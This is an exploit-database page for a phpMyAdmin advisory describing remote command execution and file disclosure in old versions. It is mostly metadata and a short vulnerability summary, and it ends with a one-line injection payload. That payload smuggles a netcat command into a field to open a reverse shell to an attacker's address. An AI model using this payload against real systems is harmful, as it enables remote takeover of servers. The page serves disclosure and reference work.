header-logo
Suggest Exploit
vendor:
phpMyAdmin
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Command Execution, File Disclosure
Unknown
CWE
Product Name: phpMyAdmin
Affected Version From: phpMyAdmin 2.6.0-pl2
Affected Version To: phpMyAdmin 2.6.0
Patch Exists: NO
Related CWE: Unknown
CPE: phpmyadmin
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

phpMyAdmin Multiple Remote Vulnerabilities

phpMyAdmin is prone to multiple remote vulnerabilities that allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These vulnerabilities are caused by insufficient sanitization of user-supplied data.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11886/info

phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data.

The command execution is reported to be present since phpMyAdmin 2.6.0-pl2. The file disclosure is present since phpMyAdmin 2.4.0.

F\';nc -e /bin/sh $IP 80;echo \'A

Navigation

Suggest Exploit

Services By CQR